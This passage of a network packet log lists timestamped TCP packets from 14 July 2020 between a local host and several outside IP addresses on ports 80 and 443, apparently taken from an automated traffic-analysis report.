                                                                                                                                      Jul 14, 2020 11:20:24.539072990 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539093018 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539112091 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539132118 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539151907 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539237022 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.539388895 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.603944063 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.603997946 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604042053 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604067087 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604105949 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604110003 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604135990 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604180098 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604229927 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604271889 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604274988 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604300976 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604345083 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604370117 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604414940 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604460001 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604461908 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604485989 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604531050 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604573965 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604583979 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604597092 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604640007 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604661942 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604705095 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604727030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604748011 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604768038 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604778051 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604785919 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604804993 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604827881 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604849100 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604871035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604892969 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604918003 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604939938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604964018 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604986906 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605009079 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605014086 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605031967 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605053902 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605076075 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605098009 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605119944 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605137110 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605140924 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605163097 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605182886 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605201006 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605221033 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605243921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605267048 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605288982 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605310917 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605333090 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605340004 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605351925 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605374098 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605396986 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605421066 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605443954 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605468035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605490923 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605513096 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605535030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605541945 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605556011 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605576038 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605595112 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605612040 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605629921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605648041 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605665922 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605685949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605705976 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605726957 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605746984 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605767012 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605778933 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605787039 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605807066 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605825901 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605844021 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605860949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605882883 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605904102 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605925083 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605945110 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.606060982 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.606208086 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.670708895 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670774937 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670821905 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670871973 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.670918941 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670984030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671008110 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671042919 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671063900 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671103001 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671127081 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671130896 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671183109 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671211004 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671238899 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671287060 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671303988 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671343088 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671367884 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671377897 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671422005 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671447992 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671478033 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671528101 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671530008 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671592951 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671636105 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671655893 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671672106 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671713114 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671756983 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671761990 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671822071 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671865940 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671870947 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671899080 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671946049 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671947956 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672012091 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672050953 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672066927 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672096968 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672117949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672137022 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672156096 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672174931 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672198057 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672199965 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672230959 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672261000 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672281027 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672316074 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672322035 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672329903 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672339916 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672368050 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672390938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672408104 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672432899 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672458887 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672482967 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672492027 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672508955 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672538042 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672558069 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672576904 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672602892 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672601938 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672633886 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672657013 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672677040 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672693968 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672709942 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672728062 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672746897 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672784090 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672795057 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672800064 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672820091 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672825098 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672836065 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672853947 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672867060 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672883034 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672910929 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672930956 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672950029 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672969103 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672987938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673005104 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673023939 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673046112 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673064947 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673084021 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673109055 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673129082 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.673135996 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673166990 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673192978 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673211098 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673230886 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673249960 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673269033 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673286915 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673307896 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673325062 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673346043 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673377991 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673404932 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673428059 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673445940 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673451900 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673470974 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673484087 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673501968 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673501968 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.673559904 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673573971 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673585892 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673609972 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673638105 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673662901 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673705101 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673718929 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673729897 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673759937 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673765898 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.673816919 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673841953 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673858881 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673875093 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673891068 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673907995 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673928976 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673948050 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673966885 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.673989058 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.674000025 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.674092054 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.878663063 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.878979921 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.943743944 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.943994999 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.008776903 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.008827925 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.009047985 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.009094954 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.074001074 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.074031115 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.074052095 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.074070930 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.074220896 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.074274063 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.074291945 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.074305058 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.139056921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.139107943 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:25.139347076 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:25.139401913 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:33.892447948 CEST4970580192.168.1.10254.225.191.113
                                                                                                                                      Jul 14, 2020 11:20:33.989675999 CEST804970554.225.191.113192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:33.989976883 CEST4970580192.168.1.10254.225.191.113
                                                                                                                                      Jul 14, 2020 11:20:33.993360996 CEST4970580192.168.1.10254.225.191.113
                                                                                                                                      Jul 14, 2020 11:20:34.090523958 CEST804970554.225.191.113192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.096435070 CEST804970554.225.191.113192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.096693039 CEST4970580192.168.1.10254.225.191.113
                                                                                                                                      Jul 14, 2020 11:20:34.469486952 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:34.529658079 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.529912949 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:34.531091928 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:34.591231108 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.623135090 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.623277903 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:20:34.841288090 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:34.969506025 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:34.970705032 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.021271944 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.149497986 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.155380011 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.155417919 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.155435085 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.155644894 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.234585047 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.363213062 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.363540888 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.403039932 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.531564951 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531631947 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531661987 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531683922 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531702995 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531727076 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531739950 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.531754017 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531770945 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531790972 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.531923056 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:35.659940958 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660003901 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660026073 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660064936 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660094023 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660114050 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660132885 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:35.660171032 CEST44349707185.206.163.136192.168.1.102
